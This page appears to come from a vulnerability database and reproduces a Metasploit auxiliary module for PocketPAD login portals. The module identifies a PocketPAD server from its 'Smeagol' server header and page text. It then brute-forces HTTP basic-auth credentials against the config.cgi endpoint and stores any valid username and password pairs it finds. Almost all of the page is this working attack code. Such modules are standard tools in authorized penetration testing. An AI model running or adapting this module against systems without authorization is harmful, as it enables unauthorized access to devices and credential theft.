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PocketPAD Login Bruteforce Force Utility

🗓️ 01 Sep 2024 00:00:00Reported by Karn Ganeshen, metasploit.comType 
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PocketPAD login brute-force utility for Metasploit module. Identifies valid credentials by scanning PocketPAD login portal and performing a brute-force attack.

Code
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::AuthBrute  
include Msf::Auxiliary::Scanner  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'PocketPAD Login Bruteforce Force Utility',  
'Description' => %{  
This module scans for PocketPAD login portal, and  
performs a login bruteforce attack to identify valid credentials.  
},  
'Author' =>  
[  
'Karn Ganeshen <KarnGaneshen[at]gmail.com>',  
],  
'License' => MSF_LICENSE  
))  
  
deregister_options('HttpUsername', 'HttpPassword')  
end  
  
def run_host(ip)  
unless is_app_popad?  
return  
end  
  
print_status("Starting login bruteforce...")  
each_user_pass do |user, pass|  
do_login(user, pass)  
end  
end  
  
#  
# What's the point of running this module if the target actually isn't PocketPAD  
#  
  
def is_app_popad?  
begin  
res = send_request_cgi(  
{  
'uri' => '/',  
'method' => 'GET'  
})  
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError  
vprint_error("HTTP Connection Failed...")  
return false  
end  
  
if res && res.code == 200 && res.headers['Server'] && res.headers['Server'].include?("Smeagol") && res.body.include?("PocketPAD")  
vprint_good("Running PocketPAD application ...")  
return true  
else  
vprint_error("Application is not PocketPAD. Module will not continue.")  
return false  
end  
end  
  
def report_cred(opts)  
service_data = {  
address: opts[:ip],  
port: opts[:port],  
service_name: opts[:service_name],  
protocol: 'tcp',  
workspace_id: myworkspace_id  
}  
  
credential_data = {  
origin_type: :service,  
module_fullname: fullname,  
username: opts[:user],  
private_data: opts[:password],  
private_type: :password  
}.merge(service_data)  
  
login_data = {  
last_attempted_time: Time.now,  
core: create_credential(credential_data),  
status: Metasploit::Model::Login::Status::SUCCESSFUL,  
proof: opts[:proof]  
}.merge(service_data)  
  
create_credential_login(login_data)  
end  
  
#  
# Brute-force the login page  
#  
  
def do_login(user, pass)  
vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}")  
begin  
res = send_request_cgi(  
{  
'uri' => '/cgi-bin/config.cgi',  
'method' => 'POST',  
'authorization' => basic_auth(user,pass),  
'vars_post' => {  
'file' => "configindex.html"  
}  
})  
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE  
vprint_error("HTTP Connection Failed...")  
return :abort  
end  
  
if (res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("Smeagol"))  
print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")  
report_cred(  
ip: rhost,  
port: rport,  
service_name: 'PocketPAD Portal',  
user: user,  
password: pass,  
proof: res.body  
)  
return :next_user  
else  
vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}")  
end  
end  
end  
`

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